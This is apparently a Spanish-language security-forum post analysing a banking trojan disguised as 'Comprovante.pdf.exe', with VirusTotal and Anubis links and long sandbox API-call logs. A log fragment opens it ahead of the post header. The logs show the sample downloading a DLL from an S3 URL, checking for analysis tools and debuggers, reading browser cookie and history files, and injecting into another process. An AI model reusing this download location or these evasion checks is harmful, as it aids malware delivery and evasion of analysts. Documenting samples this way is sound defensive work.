FreeLibrary(C:\WINDOWS\system32\msvcrt.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\ole32.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\VERSION.DLL) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\SHLWAPI.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\WININET.DLL) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\Normaliz.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\URLMON.DLL) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\iertutil.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\WINMM.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\MSCTF.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\PSAPI.DLL) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\MSACM32.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\USERENV.dll) [c:\windows\system32\dwwin.exe]
GetModuleHandle(ntdll) [c:\windows\system32\dwwin.exe]
LoadLibrary(c:\windows\system32\3082\dwintl.dll) [c:\windows\system32\dwwin.exe]
InternetGetConnectedState() [c:\windows\system32\dwwin.exe]
GetUserName() [c:\windows\system32\dwwin.exe]
OpenMutex(Local\_!MSFTHISTORY!_) [c:\windows\system32\dwwin.exe]
GetComputerName() [c:\windows\system32\dwwin.exe]
CreateMutex(Local\_!MSFTHISTORY!_) [c:\windows\system32\dwwin.exe]
OpenMutex(Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!) [c:\windows\system32\dwwin.exe]
CreateMutex(Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!) [c:\windows\system32\dwwin.exe]
CreateFile(C:\Documents and Settings\r32\Configuración local\Archivos temporales de Internet\Content.IE5\index.dat) [c:\windows\system32\dwwin.exe]
OpenMutex(Local\c:!documents and settings!r32!cookies!) [c:\windows\system32\dwwin.exe]
CreateMutex(Local\c:!documents and settings!r32!cookies!) [c:\windows\system32\dwwin.exe]
CreateFile(C:\Documents and Settings\r32\Cookies\index.dat) [c:\windows\system32\dwwin.exe]
OpenMutex(Local\c:!documents and settings!r32!configuración local!historial!history.ie5!) [c:\windows\system32\dwwin.exe]
CreateMutex(Local\c:!documents and settings!r32!configuración local!historial!history.ie5!) [c:\windows\system32\dwwin.exe]
CreateFile(C:\Documents and Settings\r32\Configuración local\Historial\History.IE5\index.dat) [c:\windows\system32\dwwin.exe]
OpenMutex(Local\WininetStartupMutex) [c:\windows\system32\dwwin.exe]
LoadLibrary(ws2_32) [c:\windows\system32\dwwin.exe]
LoadLibrary(ws2_32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(ws2help.dll) [c:\windows\system32\dwwin.exe]
GetModuleHandle(shlwapi.dll) [c:\windows\system32\dwwin.exe]
OpenMutex(Local\WininetConnectionMutex) [c:\windows\system32\dwwin.exe]
OpenMutex(Local\WininetProxyRegistryMutex) [c:\windows\system32\dwwin.exe]
LoadLibrary(rasapi32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(rasman.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(netapi32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(tapi32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(rtutils.dll) [c:\windows\system32\dwwin.exe]
CreateMutex(RasPbFile) [c:\windows\system32\dwwin.exe]
OpenMutex(RasPbFile) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\RASAPI32.dll) [c:\windows\system32\dwwin.exe]
RasEnumEntries() [c:\windows\system32\dwwin.exe]
OpenSCManager((null),(null)) [c:\windows\system32\dwwin.exe]
OpenService(RASMAN) [c:\windows\system32\dwwin.exe]
LoadLibrary(msapsspc.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(msvcrt40.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\msapsspc.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(schannel.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(crypt32.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(msasn1.dll) [c:\windows\system32\dwwin.exe]
CreateEvent(Global\crypt32LogoffEvent) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\schannel.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(digest.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\digest.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(msnsspc.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\msnsspc.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(c:\windows\system32\msv1_0.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(cryptdll.dll) [c:\windows\system32\dwwin.exe]
LoadLibrary(iphlpapi.dll) [c:\windows\system32\dwwin.exe]
lstrcmpi(COMPUTERNAME,TEMP) [c:\windows\system32\dwwin.exe]
lstrcmpi(COMPUTERNAME,TMP) [c:\windows\system32\dwwin.exe]
OpenService(Sens) [c:\windows\system32\dwwin.exe]
LoadLibrary(sensapi.dll) [c:\windows\system32\dwwin.exe]
OpenProcess(ctfmon.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(SbieCtrl.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(explorer.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(u1210.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(wireshark.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(sniff_hit.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(iexplore.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(firefox.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(VBoxTray.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(procexp.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(BSA.EXE) [c:\windows\system32\dwwin.exe]
OpenProcess(XueTr.exe) [c:\windows\system32\dwwin.exe]
OpenProcess(dumpcap.exe) [c:\windows\system32\dwwin.exe]
GetSystemDefaultLangID() [c:\windows\system32\dwwin.exe]
SetWindowPos(20994,TOPMOST) [c:\windows\system32\dwwin.exe]
GetForegroundWindow() [c:\windows\system32\dwwin.exe]
FindWindow(Shell_TrayWnd,(null)) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\windows\system32\dwwin.exe]
OpenProcess(csrss.exe) [c:\windows\system32\dwwin.exe]
CreateMutex(MSCTF.Shared.MUTEX.EBH) [c:\windows\system32\dwwin.exe]
GetModuleHandle(ole32.dll) [c:\windows\system32\dwwin.exe]
DeleteFile(C:\DOCUME~1\r32\CONFIG~1\Temp\597A56.dmp) [c:\windows\system32\dwwin.exe]
DeleteFile(C:\DOCUME~1\r32\CONFIG~1\Temp\74b4_appcompat.txt) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\3082\dwintl.dll) [c:\windows\system32\dwwin.exe]
ExitProcess(0) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\rasman.dll) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\rtutils.dll) [c:\windows\system32\dwwin.exe]
VirtualAllocEx(c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe,MEM_COMMIT,PAGE_READWRITE) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
VirtualAllocEx(c:\windows\system32\drwtsn32.exe,MEM_COMMIT,PAGE_READWRITE) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
OpenProcess(drwtsn32.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
WriteProcessMemory(c:\windows\system32\drwtsn32.exe) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
VirtualAllocEx(c:\windows\system32\drwtsn32.exe,MEM_RESERVE,PAGE_READWRITE) [c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe]
Executing: c:\windows\system32\drwtsn32.exe
LoadLibrary(msvcrt.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(advapi32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(kernel32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(gdi32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(user32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(dbgeng.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(dbghelp.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(version.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(shimeng.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(c:\windows\apppatch\acgenral.dll) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(kernel32.dll) [c:\windows\system32\drwtsn32.exe]
VirtualQueryEx(c:\windows\system32\drwtsn32.exe) [c:\windows\system32\drwtsn32.exe]
CreateMutex(SHIMLIB_LOG_MUTEX) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(winmm.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(ole32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(oleaut32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(msacm32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(shell32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(shlwapi.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(userenv.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(uxtheme.dll) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(lz32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(lz32.dll) [c:\windows\system32\drwtsn32.exe]
CreateEvent(DINPUTWINMM) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(Kernel32) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(comctl32.dll) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(EXPLORER.EXE) [c:\windows\system32\dwwin.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\windows\system32\drwtsn32.exe]
882  Seguridad Informática / Análisis y Diseño de Malware / Troyano bancario II (diferente configuración). en: 16 Febrero 2013, 14:34 pm
Del mismo contacto de correo recibo otra muestra, actúa de forma diferente y descarga una buena batería de archivos.
En esta ocasión analicé el ejecutable mediante "Buster Sandbox".

URL: Pedir por MP.

Análisis online:

Comprovante.pdf.exe:
Virutotal: https://www.virustotal.com/file/a8dd1f76473cb69e7012964a5d723cb81014a13413df572735c7ae28b9e297cd/analysis/1360255230/
Anubis: http://anubis.iseclab.org/?action=result&task_id=1a9a78b746cd486e4adb6aa28bdf02761&call=first

Archivos descargados:

jjca.dll:
Virutotal: https://www.virustotal.com/file/fa3651cfcd2aca6c7303ef8017986669465b724dc96ceaddcb249f66b487d420/analysis/1360254397/
Anubis: http://anubis.iseclab.org/?action=result&task_id=18c69386fee0475e4d56e22cb9bc33ac6

jsob.exe:
Virutotal: https://www.virustotal.com/file/d4ae23bf307150d9fd664eaac06bcce9d2101d946089a506b25f3f84d8248a8e/analysis/1360254575/
Anubis:

jsobs.exe:
Virutotal: https://www.virustotal.com/file/e914bda041273705403f2a968f557f67053b609daae77ca37c05f97d922a9261/analysis/1360254739/
Anubis: http://anubis.iseclab.org/?action=result&task_id=1d19bec75e40ba5e461ef3b2548210e08

Projeto.exe:
Virutotal: https://www.virustotal.com/file/b727103a389dad4ab9e773906e898c30e50b0f0191a8299b27afaefca853f49e/analysis/1360254942/
Anubis: http://anubis.iseclab.org/?action=result&task_id=161f701d97b086d7421afd1ae0c2ba446

winsa64.exe:
Virutotal: https://www.virustotal.com/file/b727103a389dad4ab9e773906e898c30e50b0f0191a8299b27afaefca853f49e/analysis/1360255019/
Anubis: http://anubis.iseclab.org/?action=result&task_id=1abaf0d0a6553c1e4bda858417f3f38f7&call=first

Compresión y compilado:





Ejecución de Comprovante.pdf.exe:

Código:
Executing: c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe
LoadLibrary(kernel32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(advapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(comctl32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msvcrt.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(shlwapi.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(gdi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(oleaut32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(ole32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(urlmon.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(iertutil.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(user32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(version.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(lz32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(lz32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(kernel32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
VirtualQueryEx(c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(Kernel32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETWHEELSCROLLLINES,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcessToken(C:\Documents and Settings\r32\Mis documentos\Descargas\Comprovante\Comprovante.pdf2.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(oleaut32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(USER32.DLL) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
IsDebuggerPresent() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
BitBlt() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(version.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(ShimCacheMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\Documents and Settings\r32\Mis documentos\Descargas\Comprovante\Comprovante.pdf2.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(USER32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(comctl32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SystemParametersInfo(SPI_GETWORKAREA,0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SetTimer(b01a0) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SetTimer(13020c) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SetTimer(1001c4) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(explorer.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(ctfmon.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(sniff_hit.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(wireshark.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(SbieCtrl.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(VBoxTray.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(procexp.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenProcess(Pm.exe) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetForegroundWindow() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(C:\WINDOWS\system32\Msimtf.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
SetTimer(1401a8) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
URLDownloadToFile(https://s3-sa-east-1.amazonaws.com/banolo99/jjca.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\!IETld!Mutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rpcrt4.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetComputerName() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\!IETld!Mutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\URLMON.DLL) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(wininet.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
ResumeThread() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(normaliz.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(Advapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
InternetSetOption() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetUserName() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(secur32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(shell32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(LPK.DLL) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\_!MSFTHISTORY!_) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\_!MSFTHISTORY!_) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\c:!documents and settings!r32!configuración local!archivos temporales de internet!content.ie5!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateFile(C:\Documents and Settings\r32\Configuración local\Archivos temporales de Internet\Content.IE5\index.dat) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\c:!documents and settings!r32!cookies!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\c:!documents and settings!r32!cookies!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateFile(C:\Documents and Settings\r32\Cookies\index.dat) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\c:!documents and settings!r32!configuración local!historial!history.ie5!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(Local\c:!documents and settings!r32!configuración local!historial!history.ie5!) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateFile(C:\Documents and Settings\r32\Configuración local\Historial\History.IE5\index.dat) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\WininetStartupMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(ws2_32) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(ws2_32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(ws2help.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
GetModuleHandle(shlwapi.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\WininetConnectionMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(Local\WininetProxyRegistryMutex) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
InternetGetConnectedState() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rasapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateEvent(DINPUTWINMM) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rasman.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(netapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(tapi32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(rtutils.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(winmm.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateMutex(RasPbFile) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenMutex(RasPbFile) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
RasEnumEntries() [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\RASAPI32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenSCManager((null),(null)) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
OpenService(RASMAN) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(userenv.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
lstrcmpi(WinNT,WinNT) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateEvent(Global\userenv:  User Profile setup event) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msapsspc.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
lstrcmpi(COMPUTERNAME,TEMP) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
lstrcmpi(COMPUTERNAME,TMP) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msvcrt40.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\msapsspc.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(schannel.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(crypt32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msasn1.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\ADVAPI32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
CreateEvent(Global\crypt32LogoffEvent) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\schannel.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\kernel32.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(digest.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\digest.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(msnsspc.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
FreeLibrary(C:\WINDOWS\system32\msnsspc.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
LoadLibrary(c:\windows\system32\msv1_0.dll) [c:\documents and settings\r32\mis documentos\descargas\comprovante\comprovante.pdf2.exe]
